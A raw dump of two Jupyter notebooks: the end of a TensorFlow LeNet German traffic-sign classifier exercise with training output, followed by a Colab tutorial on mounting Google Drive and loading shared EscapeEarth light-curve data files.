fc3_b = tf.Variable(tf.zeros(43))\n logits = tf.matmul(fc2, fc3_W) + fc3_b\n\n return logits",
"_____no_output_____"
]
],
[
[
"### Train, Validate and Test the Model",
"_____no_output_____"
],
[
"A validation set can be used to assess how well the model is performing. A low accuracy on the training and validation\nsets imply underfitting. A high accuracy on the training set but low accuracy on the validation set implies overfitting.",
"_____no_output_____"
]
],
[
[
"### Train your model here.\n### Calculate and report the accuracy on the training and validation set.\n### Once a final model architecture is selected, \n### the accuracy on the test set should be calculated and reported as well.\n### Feel free to use as many code cells as needed.\nrate = 0.001\n\nx = tf.placeholder(tf.float32, (None, 32, 32, 1))\ny = tf.placeholder(tf.int32, (None))\none_hot_y = tf.one_hot(y, 43)\n\n\n\nlogits = LeNet(x)\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits)\nloss_operation = tf.reduce_mean(cross_entropy)\noptimizer = tf.train.AdamOptimizer(learning_rate = rate)\ntraining_operation = optimizer.minimize(loss_operation)\n\n#EVALUATION\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))\naccuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nsaver = tf.train.Saver()\n\ndef evaluate(X_data, y_data):\n num_examples = len(X_data)\n total_accuracy = 0\n sess = tf.get_default_session()\n for offset in range(0, num_examples, BATCH_SIZE):\n batch_x, batch_y = X_data[offset:offset+BATCH_SIZE], y_data[offset:offset+BATCH_SIZE]\n accuracy = sess.run(accuracy_operation, feed_dict={x: batch_x, y: batch_y})\n total_accuracy += (accuracy * len(batch_x))\n return total_accuracy / num_examples",
"_____no_output_____"
],
[
"with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n num_examples = len(X_train)\n \n print(\"Training...\")\n print()\n for i in range(EPOCHS):\n X_train, y_train = shuffle(X_train, y_train)\n for offset in range(0, num_examples, BATCH_SIZE):\n end = offset + BATCH_SIZE\n batch_x, batch_y = X_train[offset:end], y_train[offset:end]\n sess.run(training_operation, feed_dict={x: batch_x, y: batch_y})\n \n validation_accuracy = evaluate(X_valid, y_valid)\n print(\"EPOCH {} ...\".format(i+1))\n print(\"Validation Accuracy = {:.3f}\".format(validation_accuracy))\n print()\n \n saver.save(sess, './lenet')\n print(\"Model saved\")",
"Training...\n\nEPOCH 1 ...\nValidation Accuracy = 0.743\n\nEPOCH 2 ...\nValidation Accuracy = 0.832\n\nEPOCH 3 ...\nValidation Accuracy = 0.880\n\nEPOCH 4 ...\nValidation Accuracy = 0.891\n\nEPOCH 5 ...\nValidation Accuracy = 0.874\n\nEPOCH 6 ...\nValidation Accuracy = 0.897\n\nEPOCH 7 ...\nValidation Accuracy = 0.921\n\nEPOCH 8 ...\nValidation Accuracy = 0.903\n\nEPOCH 9 ...\nValidation Accuracy = 0.908\n\nEPOCH 10 ...\nValidation Accuracy = 0.912\n\nEPOCH 11 ...\nValidation Accuracy = 0.918\n\nEPOCH 12 ...\nValidation Accuracy = 0.927\n\nEPOCH 13 ...\nValidation Accuracy = 0.932\n\nEPOCH 14 ...\nValidation Accuracy = 0.924\n\nEPOCH 15 ...\nValidation Accuracy = 0.910\n\nEPOCH 16 ...\nValidation Accuracy = 0.927\n\nEPOCH 17 ...\nValidation Accuracy = 0.926\n\nEPOCH 18 ...\nValidation Accuracy = 0.932\n\nEPOCH 19 ...\nValidation Accuracy = 0.930\n\nEPOCH 20 ...\nValidation Accuracy = 0.933\n\nEPOCH 21 ...\nValidation Accuracy = 0.947\n\nEPOCH 22 ...\nValidation Accuracy = 0.939\n\nEPOCH 23 ...\nValidation Accuracy = 0.943\n\nEPOCH 24 ...\nValidation Accuracy = 0.939\n\nEPOCH 25 ...\nValidation Accuracy = 0.941\n\nEPOCH 26 ...\nValidation Accuracy = 0.944\n\nEPOCH 27 ...\nValidation Accuracy = 0.950\n\nEPOCH 28 ...\nValidation Accuracy = 0.949\n\nEPOCH 29 ...\nValidation Accuracy = 0.943\n\nEPOCH 30 ...\nValidation Accuracy = 0.938\n\nEPOCH 31 ...\nValidation Accuracy = 0.941\n\nEPOCH 32 ...\nValidation Accuracy = 0.915\n\nEPOCH 33 ...\nValidation Accuracy = 0.935\n\nEPOCH 34 ...\nValidation Accuracy = 0.948\n\nEPOCH 35 ...\nValidation Accuracy = 0.950\n\nEPOCH 36 ...\nValidation Accuracy = 0.950\n\nEPOCH 37 ...\nValidation Accuracy = 0.954\n\nEPOCH 38 ...\nValidation Accuracy = 0.949\n\nEPOCH 39 ...\nValidation Accuracy = 0.951\n\nEPOCH 40 ...\nValidation Accuracy = 0.951\n\nModel saved\n"
],
[
"with tf.Session() as sess:\n saver.restore(sess, tf.train.latest_checkpoint('.'))\n\n train_accuracy = evaluate(X_train, y_train)\n print(\"Train Accuracy = {:.3f}\".format(train_accuracy))\n \n valid_accuracy = evaluate(X_valid, y_valid)\n print(\"Valid Accuracy = {:.3f}\".format(valid_accuracy)) \n \n test_accuracy = evaluate(X_test, y_test)\n print(\"Test Accuracy = {:.3f}\".format(test_accuracy))",
"INFO:tensorflow:Restoring parameters from ./lenet\nTrain Accuracy = 1.000\nValid Accuracy = 0.951\nTest Accuracy = 0.919\n"
]
],
[
[
"---\n\n## Step 3: Test a Model on New Images\n\nTo give yourself more insight into how your model is working, download at least five pictures of German traffic signs from the web and use your model to predict the traffic sign type.\n\nYou may find `signnames.csv` useful as it contains mappings from the class id (integer) to the actual sign name.",
"_____no_output_____"
]
],
[
[
"import glob\nimport cv2\nimport numpy as np\nname_values = np.genfromtxt('signnames.csv', skip_header=1, dtype=[('myint','i8'), ('mysring','S55')], delimiter=',')\nmy_images = sorted(glob.glob('./test_images/*.png'))\nmy_labels = np.array([1, 22, 35,2, 37, 18])\n\nfigures = {}\nlabels = {}\nmy_signs = []\nindex = 0\ndef plot_figures(figures, nrows = 1, ncols=1, labels=None):\n fig, axs = plt.subplots(ncols=ncols, nrows=nrows, figsize=(12, 14))\n axs = axs.ravel()\n for index, title in zip(range(len(figures)), figures):\n axs[index].imshow(figures[title], plt.gray())\n if(labels != None):\n axs[index].set_title(labels[index])\n else:\n axs[index].set_title(title)\n \n axs[index].set_axis_off()\n \n plt.tight_layout()\nfor my_image in my_images:\n img = cv2.cvtColor(cv2.imread(my_image), cv2.COLOR_BGR2RGB)\n my_signs.append(img)\n figures[index] = img\n labels[index] = name_values[my_labels[index]][1].decode('ascii')\n index += 1\n\nplot_figures(figures, 3, 2, labels)",
"_____no_output_____"
],
[
"my_signs = np.array(my_signs)\nmy_signs = np.sum(my_signs/3, axis=3, keepdims=True)\nmy_signs = (my_signs-128)/128\n\nnumber_to_stop = 6\nfigures = {}\nlabels = {}\nfor i in range(number_to_stop):\n labels[i] = name_values[my_labels[i]][1].decode('ascii')\n figures[i] = my_signs[i].squeeze()\n \nplot_figures(figures, 3, 2, labels)",
"_____no_output_____"
]
],
[
[
"### Load and Output the Images",
"_____no_output_____"
]
],
[
[
"### Load the images and plot them here.\n### Feel free to use as many code cells as needed.",
"_____no_output_____"
]
],
[
[
"### Predict the Sign Type for Each Image",
"_____no_output_____"
]
],
[
[
"### Run the predictions here and use the model to output the prediction for each image.\n### Make sure to pre-process the images with the same pre-processing pipeline used earlier.\n### Feel free to use as many code cells as needed.\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n# saver = tf.train.import_meta_graph('./lenet.meta')\n saver.restore(sess, \"./lenet\")\n my_accuracy = evaluate(my_signs, my_labels)\n print(\"My Data Set Accuracy = {:.3f}\".format(my_accuracy))",
"INFO:tensorflow:Restoring parameters from ./lenet\nMy Data Set Accuracy = 0.833\n"
]
],
[
[
"### Analyze Performance",
"_____no_output_____"
]
],
[
[
"### Calculate the accuracy for these 5 new images. \n### For example, if the model predicted 1 out of 5 signs correctly, it's 20% accurate on these new images.\nmy_single_item_array = []\nmy_single_item_label_array = []\n\nfor i in range(6):\n my_single_item_array.append(my_signs[i])\n my_single_item_label_array.append(my_labels[i])\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n# saver = tf.train.import_meta_graph('./lenet.meta')\n saver.restore(sess, \"./lenet\")\n my_accuracy = evaluate(my_single_item_array, my_single_item_label_array)\n print('Image {}'.format(i+1))\n print(\"Image Accuracy = {:.3f}\".format(my_accuracy))\n print()",
"INFO:tensorflow:Restoring parameters from ./lenet\nImage 1\nImage Accuracy = 1.000\n\nINFO:tensorflow:Restoring parameters from ./lenet\nImage 2\nImage Accuracy = 1.000\n\nINFO:tensorflow:Restoring parameters from ./lenet\nImage 3\nImage Accuracy = 1.000\n\nINFO:tensorflow:Restoring parameters from ./lenet\nImage 4\nImage Accuracy = 0.750\n\nINFO:tensorflow:Restoring parameters from ./lenet\nImage 5\nImage Accuracy = 0.800\n\nINFO:tensorflow:Restoring parameters from ./lenet\nImage 6\nImage Accuracy = 0.833\n\n"
]
],
[
[
"### Output Top 5 Softmax Probabilities For Each Image Found on the Web",
"_____no_output_____"
],
[
"For each of the new images, print out the model's softmax probabilities to show the **certainty** of the model's predictions (limit the output to the top 5 probabilities for each image). [`tf.nn.top_k`](https://www.tensorflow.org/versions/r0.12/api_docs/python/nn.html#top_k) could prove helpful here. \n\nThe example below demonstrates how tf.nn.top_k can be used to find the top k predictions for each image.\n\n`tf.nn.top_k` will return the values and indices (class ids) of the top k predictions. So if k=3, for each sign, it'll return the 3 largest probabilities (out of a possible 43) and the correspoding class ids.\n\nTake this numpy array as an example. The values in the array represent predictions. The array contains softmax probabilities for five candidate images with six possible classes. `tf.nn.top_k` is used to choose the three classes with the highest probability:\n\n```\n# (5, 6) array\na = np.array([[ 0.24879643, 0.07032244, 0.12641572, 0.34763842, 0.07893497,\n 0.12789202],\n [ 0.28086119, 0.27569815, 0.08594638, 0.0178669 , 0.18063401,\n 0.15899337],\n [ 0.26076848, 0.23664738, 0.08020603, 0.07001922, 0.1134371 ,\n 0.23892179],\n [ 0.11943333, 0.29198961, 0.02605103, 0.26234032, 0.1351348 ,\n 0.16505091],\n [ 0.09561176, 0.34396535, 0.0643941 , 0.16240774, 0.24206137,\n 0.09155967]])\n```\n\nRunning it through `sess.run(tf.nn.top_k(tf.constant(a), k=3))` produces:\n\n```\nTopKV2(values=array([[ 0.34763842, 0.24879643, 0.12789202],\n [ 0.28086119, 0.27569815, 0.18063401],\n [ 0.26076848, 0.23892179, 0.23664738],\n [ 0.29198961, 0.26234032, 0.16505091],\n [ 0.34396535, 0.24206137, 0.16240774]]), indices=array([[3, 0, 5],\n [0, 1, 4],\n [0, 5, 1],\n [1, 3, 5],\n [1, 4, 3]], dtype=int32))\n```\n\nLooking just at the first row we get `[ 0.34763842, 0.24879643, 0.12789202]`, you can confirm these are the 3 largest probabilities in `a`. You'll also notice `[3, 0, 5]` are the corresponding indices.",
"_____no_output_____"
]
],
[
[
"### Print out the top five softmax probabilities for the predictions on the German traffic sign images found on the web. \n### Feel free to use as many code cells as needed.",
"_____no_output_____"
]
],
[
[
"### Project Writeup\n\nOnce you have completed the code implementation, document your results in a project writeup using this [template](https://github.com/udacity/CarND-Traffic-Sign-Classifier-Project/blob/master/writeup_template.md) as a guide. The writeup can be in a markdown or pdf file. ",
"_____no_output_____"
],
[
"> **Note**: Once you have completed all of the code implementations and successfully answered each question above, you may finalize your work by exporting the iPython Notebook as an HTML document. You can do this by using the menu above and navigating to \\n\",\n \"**File -> Download as -> HTML (.html)**. Include the finished document along with this notebook as your submission.",
"_____no_output_____"
],
[
"---\n\n## Step 4 (Optional): Visualize the Neural Network's State with Test Images\n\n This Section is not required to complete but acts as an additional excersise for understaning the output of a neural network's weights. While neural networks can be a great learning device they are often referred to as a black box. We can understand what the weights of a neural network look like better by plotting their feature maps. After successfully training your neural network you can see what it's feature maps look like by plotting the output of the network's weight layers in response to a test stimuli image. From these plotted feature maps, it's possible to see what characteristics of an image the network finds interesting. For a sign, maybe the inner network feature maps react with high activation to the sign's boundary outline or to the contrast in the sign's painted symbol.\n\n Provided for you below is the function code that allows you to get the visualization output of any tensorflow weight layer you want. The inputs to the function should be a stimuli image, one used during training or a new one you provided, and then the tensorflow variable name that represents the layer's state during the training process, for instance if you wanted to see what the [LeNet lab's](https://classroom.udacity.com/nanodegrees/nd013/parts/fbf77062-5703-404e-b60c-95b78b2f3f9e/modules/6df7ae49-c61c-4bb2-a23e-6527e69209ec/lessons/601ae704-1035-4287-8b11-e2c2716217ad/concepts/d4aca031-508f-4e0b-b493-e7b706120f81) feature maps looked like for it's second convolutional layer you could enter conv2 as the tf_activation variable.\n\nFor an example of what feature map outputs look like, check out NVIDIA's results in their paper [End-to-End Deep Learning for Self-Driving Cars](https://devblogs.nvidia.com/parallelforall/deep-learning-self-driving-cars/) in the section Visualization of internal CNN State. NVIDIA was able to show that their network's inner weights had high activations to road boundary lines by comparing feature maps from an image with a clear path to one without. Try experimenting with a similar test to show that your trained network's weights are looking for interesting features, whether it's looking at differences in feature maps from images with or without a sign, or even what feature maps look like in a trained network vs a completely untrained one on the same sign image.\n\n<figure>\n <img src=\"visualize_cnn.png\" width=\"380\" alt=\"Combined Image\" />\n <figcaption>\n <p></p> \n <p style=\"text-align: center;\"> Your output should look something like this (above)</p> \n </figcaption>\n</figure>\n <p></p> \n",
"_____no_output_____"
]
],
[
[
"### Visualize your network's feature maps here.\n### Feel free to use as many code cells as needed.\n\n# image_input: the test image being fed into the network to produce the feature maps\n# tf_activation: should be a tf variable name used during your training procedure that represents the calculated state of a specific weight layer\n# activation_min/max: can be used to view the activation contrast in more detail, by default matplot sets min and max to the actual min and max values of the output\n# plt_num: used to plot out multiple different weight feature map sets on the same block, just extend the plt number for each new feature map entry\n\ndef outputFeatureMap(image_input, tf_activation, activation_min=-1, activation_max=-1 ,plt_num=1):\n # Here make sure to preprocess your image_input in a way your network expects\n # with size, normalization, ect if needed\n # image_input =\n # Note: x should be the same name as your network's tensorflow data placeholder variable\n # If you get an error tf_activation is not defined it may be having trouble accessing the variable from inside a function\n activation = tf_activation.eval(session=sess,feed_dict={x : image_input})\n featuremaps = activation.shape[3]\n plt.figure(plt_num, figsize=(15,15))\n for featuremap in range(featuremaps):\n plt.subplot(6,8, featuremap+1) # sets the number of feature maps to show on each row and column\n plt.title('FeatureMap ' + str(featuremap)) # displays the feature map number\n if activation_min != -1 & activation_max != -1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmin =activation_min, vmax=activation_max, cmap=\"gray\")\n elif activation_max != -1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmax=activation_max, cmap=\"gray\")\n elif activation_min !=-1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmin=activation_min, cmap=\"gray\")\n else:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", cmap=\"gray\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
]
] |
e706dedce3d41db086daab2a673d202d9f84d66f | 37,547 | ipynb | Jupyter Notebook | TensorNetworks/.ipynb_checkpoints/Try Include-checkpoint.ipynb | BlackBodyRadiation/JupyterTNN | 9f3c207fdff32ce68e791a8cedab9da7cbe37fee | [
"MIT"
] | null | null | null | TensorNetworks/.ipynb_checkpoints/Try Include-checkpoint.ipynb | BlackBodyRadiation/JupyterTNN | 9f3c207fdff32ce68e791a8cedab9da7cbe37fee | [
"MIT"
] | null | null | null | TensorNetworks/.ipynb_checkpoints/Try Include-checkpoint.ipynb | BlackBodyRadiation/JupyterTNN | 9f3c207fdff32ce68e791a8cedab9da7cbe37fee | [
"MIT"
] | null | null | null | 481.371795 | 35,778 | 0.942765 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
e706e64177d45c859c909ec93e84c04ea3d5ea17 | 32,036 | ipynb | Jupyter Notebook | Interns/Sarah/How_to_access_our_shared_data_folder.ipynb | sarahrdk/EscapeEarth | 76dd2df6671aa6c193aa528a344407df0a5457aa | [
"MIT"
] | null | null | null | Interns/Sarah/How_to_access_our_shared_data_folder.ipynb | sarahrdk/EscapeEarth | 76dd2df6671aa6c193aa528a344407df0a5457aa | [
"MIT"
] | null | null | null | Interns/Sarah/How_to_access_our_shared_data_folder.ipynb | sarahrdk/EscapeEarth | 76dd2df6671aa6c193aa528a344407df0a5457aa | [
"MIT"
] | null | null | null | 46.836257 | 392 | 0.475434 | [
[
[
"<a href=\"https://colab.research.google.com/github/sarahrdk/EscapeEarth/blob/main/Interns/Sarah/How_to_access_our_shared_data_folder.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# __How to mount our google drive__ \n#### so we can open the data in our shared EscapeEarthData folder.",
"_____no_output_____"
]
],
[
[
"# this cell mounts your drive but you also must follow these\n# STEPS:\n# 1) run this cell and a url will display that you should click on\n# 2) select your google account if applicable\n# 3) click 'Allow' when asked by 'Google Drive File Stream wants to access your Google Account'\n# 4) click on the copy icon next to the code displayed\n# 5) paste that code into the below cell prompt 'Enter your authorization code:'\n# 6) hit the Enter key and wait\n# 7) successful mounting is indicated by the statement 'Mounted at /content/gdrive'\n\nfrom google.colab import drive\n\ndrive.mount('/content/gdrive')",
"Mounted at /content/gdrive\n"
],
[
"# this cell lists what's in your google drive \n# you should see the shared 'EscapeEarthData' folder\n!ls /content/gdrive/My\\ Drive",
"amnh EscapeEarthData Files imovis other\n"
]
],
[
[
"#### _IF_ you get an error __\"ls: cannot access '/content/gdrive/My Drive': Transport endpoint is not connected\"__ you need to remount your drive. Copy/Paste the below code into a new cell to do so:\n\n\n\n```\nfrom google.colab import drive\ndrive.mount('/content/gdrive', force_remount=True)\n```\n\n#### _Otherwise_, you may proceed but be aware of this issue as it can arise at any time.",
"_____no_output_____"
]
],
[
[
"# we can also list the contents of our shared folder \n# (once i add more data this wont be a good thing to do tho)\n!ls /content/gdrive/My\\ Drive/EscapeEarthData",
"1161345_lc.csv\t2161623_lc.csv\tbls_powers.npy\tdf8.csv\n1573836_lc.csv\tActivity-2\tbls_rps.npy\n"
]
],
[
[
"# __How to Open Data Files__ \n#### Before we can open these files we will need to import, _and/or_ install then import, packages & their dependencies ",
"_____no_output_____"
]
],
[
[
"# import dependencies\nimport numpy as np\nimport pandas as pd\n# example of an installation then import (we'll need this later)\n!pip install lightkurve\nimport lightkurve as lk",
"Collecting lightkurve\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/6b/cb/a2917205537f6bad53b109365e09abe946afbf5d8a4e1f46c3f75abcb398/lightkurve-1.11.3-py3-none-any.whl (515kB)\n\u001b[K |████████████████████████████████| 522kB 2.8MB/s \n\u001b[?25hCollecting astroquery>=0.3.9\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/1b/f8/4690523783691ed816b3469c3ec611af3798594d37ade510dd918d59f57e/astroquery-0.4.1.tar.gz (6.5MB)\n\u001b[K |████████████████████████████████| 6.5MB 8.5MB/s \n\u001b[?25hRequirement already satisfied: astropy>=1.3 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (4.0.1.post1)\nRequirement already satisfied: patsy>=0.5.1 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (0.5.1)\nRequirement already satisfied: requests in /usr/local/lib/python3.6/dist-packages (from lightkurve) (2.23.0)\nCollecting uncertainties\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/b0/e0/fc200da8190729dcb685ae4877ed6936d31d64aeccb8cc355d9ec982681d/uncertainties-3.1.4-py2.py3-none-any.whl (246kB)\n\u001b[K |████████████████████████████████| 256kB 29.5MB/s \n\u001b[?25hRequirement already satisfied: numpy>=1.11 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (1.18.5)\nCollecting fbpca>=1.0\n Downloading https://files.pythonhosted.org/packages/a7/a5/2085d0645a4bb4f0b606251b0b7466c61326e4a471d445c1c3761a2d07bc/fbpca-1.0.tar.gz\nRequirement already satisfied: pandas in /usr/local/lib/python3.6/dist-packages (from lightkurve) (1.1.2)\nRequirement already satisfied: matplotlib>=1.5.3 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (3.2.2)\nRequirement already satisfied: bs4 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (0.0.1)\nCollecting scipy!=1.4.0,!=1.4.1,>=0.19.0\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/2b/a8/f4c66eb529bb252d50e83dbf2909c6502e2f857550f22571ed8556f62d95/scipy-1.5.2-cp36-cp36m-manylinux1_x86_64.whl (25.9MB)\n\u001b[K |████████████████████████████████| 25.9MB 130kB/s \n\u001b[?25hCollecting oktopus\n Downloading https://files.pythonhosted.org/packages/2d/6e/7b7e11442ff70286c22614d200f6145f83528dc6c99fec0982665e25c8d3/oktopus-0.1.2.tar.gz\nRequirement already satisfied: tqdm>=4.25.0 in /usr/local/lib/python3.6/dist-packages (from lightkurve) (4.41.1)\nCollecting keyring>=4.0\n Downloading https://files.pythonhosted.org/packages/e4/ed/7be20815f248b0d6aae406783c2bee392640924623c4e17b50ca90c7f74d/keyring-21.4.0-py3-none-any.whl\nRequirement already satisfied: beautifulsoup4>=4.3.2 in /usr/local/lib/python3.6/dist-packages (from astroquery>=0.3.9->lightkurve) (4.6.3)\nRequirement already satisfied: html5lib>=0.999 in /usr/local/lib/python3.6/dist-packages (from astroquery>=0.3.9->lightkurve) (1.0.1)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from astroquery>=0.3.9->lightkurve) (1.15.0)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests->lightkurve) (3.0.4)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests->lightkurve) (2.10)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests->lightkurve) (1.24.3)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests->lightkurve) (2020.6.20)\nRequirement already satisfied: future in /usr/local/lib/python3.6/dist-packages (from uncertainties->lightkurve) (0.16.0)\nRequirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas->lightkurve) (2.8.1)\nRequirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas->lightkurve) (2018.9)\nRequirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib>=1.5.3->lightkurve) (0.10.0)\nRequirement already satisfied: kiwisolver>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib>=1.5.3->lightkurve) (1.2.0)\nRequirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib>=1.5.3->lightkurve) (2.4.7)\nRequirement already satisfied: autograd in /usr/local/lib/python3.6/dist-packages (from oktopus->lightkurve) (1.3)\nCollecting jeepney>=0.4.2; sys_platform == \"linux\"\n Downloading https://files.pythonhosted.org/packages/79/31/2e8d42727595faf224c6dbb748c32b192e212f25495fe841fb7ce8e168b8/jeepney-0.4.3-py3-none-any.whl\nCollecting SecretStorage>=3; sys_platform == \"linux\"\n Downloading https://files.pythonhosted.org/packages/c3/50/8a02cad020e949e6d7105f5f4530d41e3febcaa5b73f8f2148aacb3aeba5/SecretStorage-3.1.2-py3-none-any.whl\nRequirement already satisfied: importlib-metadata; python_version < \"3.8\" in /usr/local/lib/python3.6/dist-packages (from keyring>=4.0->astroquery>=0.3.9->lightkurve) (2.0.0)\nRequirement already satisfied: webencodings in /usr/local/lib/python3.6/dist-packages (from html5lib>=0.999->astroquery>=0.3.9->lightkurve) (0.5.1)\nCollecting cryptography\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/33/62/30f6936941d87a5ed72efb24249437824f6b2c953901245b58c91fde2f27/cryptography-3.1.1-cp35-abi3-manylinux2010_x86_64.whl (2.6MB)\n\u001b[K |████████████████████████████████| 2.6MB 38.8MB/s \n\u001b[?25hRequirement already satisfied: zipp>=0.5 in /usr/local/lib/python3.6/dist-packages (from importlib-metadata; python_version < \"3.8\"->keyring>=4.0->astroquery>=0.3.9->lightkurve) (3.2.0)\nRequirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/local/lib/python3.6/dist-packages (from cryptography->SecretStorage>=3; sys_platform == \"linux\"->keyring>=4.0->astroquery>=0.3.9->lightkurve) (1.14.3)\nRequirement already satisfied: pycparser in /usr/local/lib/python3.6/dist-packages (from cffi!=1.11.3,>=1.8->cryptography->SecretStorage>=3; sys_platform == \"linux\"->keyring>=4.0->astroquery>=0.3.9->lightkurve) (2.20)\nBuilding wheels for collected packages: astroquery, fbpca, oktopus\n Building wheel for astroquery (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for astroquery: filename=astroquery-0.4.1-cp36-none-any.whl size=3831873 sha256=706641e0976ba9ffd7c961cc24cb51a7d02d4a81fbafcba7cdca66f230532b1d\n Stored in directory: /root/.cache/pip/wheels/88/f8/b7/a254cd96e808f708bc0b7d755a8e095c56fbbe94099d7b464f\n Building wheel for fbpca (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for fbpca: filename=fbpca-1.0-cp36-none-any.whl size=11376 sha256=9b5d900a1c150e09af098fdf8d9ba71e1aa6f4ae480cb64b4a40f146486b8fd6\n Stored in directory: /root/.cache/pip/wheels/53/a2/dd/9b66cf53dbc58cec1e613d216689e5fa946d3e7805c30f60dc\n Building wheel for oktopus (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for oktopus: filename=oktopus-0.1.2-cp36-none-any.whl size=12781 sha256=0f0a58ce0c990c713be0d6b8c0796a42bfaf3fe5bfe41ea94187eb2c9e74470b\n Stored in directory: /root/.cache/pip/wheels/9b/90/81/098fc66ee56166d63c9a8fc0a9672ae7b3423396a588ec952a\nSuccessfully built astroquery fbpca oktopus\n\u001b[31mERROR: tensorflow 2.3.0 has requirement scipy==1.4.1, but you'll have scipy 1.5.2 which is incompatible.\u001b[0m\n\u001b[31mERROR: albumentations 0.1.12 has requirement imgaug<0.2.7,>=0.2.5, but you'll have imgaug 0.2.9 which is incompatible.\u001b[0m\nInstalling collected packages: jeepney, cryptography, SecretStorage, keyring, astroquery, uncertainties, fbpca, scipy, oktopus, lightkurve\n Found existing installation: scipy 1.4.1\n Uninstalling scipy-1.4.1:\n Successfully uninstalled scipy-1.4.1\nSuccessfully installed SecretStorage-3.1.2 astroquery-0.4.1 cryptography-3.1.1 fbpca-1.0 jeepney-0.4.3 keyring-21.4.0 lightkurve-1.11.3 oktopus-0.1.2 scipy-1.5.2 uncertainties-3.1.4\n"
],
[
"# now we can open each data file, here are some examples:\n## NOTICE: for the path I do NOT use the \"\\\" in My\\ Drive\" like we did for the terminal commands above\n\n# for .csv files\ndata_1 = pd.read_csv('/content/gdrive/My Drive/EscapeEarthData/2161623_lc.csv') \n# for .npy files\ndata_2 = np.load('/content/gdrive/My Drive/EscapeEarthData/bls_powers.npy')\n# let's see the data\nprint('Data-1 Example:',data_1)\nprint('Data-2 Example:',data_2)",
"Data-1 Example: # bjd\\tphase\\traw_flux\\traw_err\\tcorr_flux\\tcorr_err\\tdtr_flux\\tdtr_err\n0 56107.16069599\\t0.03416000\\t0.593396\\t0.000242... \n1 56107.18113035\\t0.04310882\\t0.745326\\t0.000245... \n2 56107.20156461\\t0.05205760\\t0.871438\\t0.000247... \n3 56107.22199908\\t0.06100646\\t0.960180\\t0.000249... \n4 56107.24243344\\t0.06995528\\t0.994236\\t0.000252... \n... ... \n8631 56304.05439858\\t0.25982505\\t1.050795\\t0.000264... \n8632 56304.07483160\\t0.26877329\\t1.050991\\t0.000264... \n8633 56304.09526452\\t0.27772148\\t1.051052\\t0.000264... \n8634 56304.11569744\\t0.28666967\\t1.050454\\t0.000264... \n8635 56304.13613036\\t0.29561785\\t1.050061\\t0.000264... \n\n[8636 rows x 1 columns]\nData-2 Example: [34615 294 12 ... 43420 32493 4189]\n"
],
[
"# Data-1 Example's format isn't a typical dataframe so let's try this\ndata_1",
"_____no_output_____"
],
[
"# that looks better but we still only have one column \n# - let's use input arguments to fix the formatting\n\n#notice I'm rewriting the variable too\ndata_1 = pd.read_csv('/content/gdrive/My Drive/EscapeEarthData/2161623_lc.csv',header=0,delimiter ='\t')\ndata_1",
"_____no_output_____"
],
[
"# Here's another trick \n# our path to the shared folder is long and we may not want to type it everytime\n# we can save the path and insert it as shown below\n\nmypath = '/content/gdrive/My Drive/EscapeEarthData'\n\n#let's open yet another data file\ndata_3 = np.load('{}/bls_powers.npy'.format(mypath))\nprint('Data-3 Example:',data_3)",
"Data-3 Example: [34615 294 12 ... 43420 32493 4189]\n"
]
],
[
[
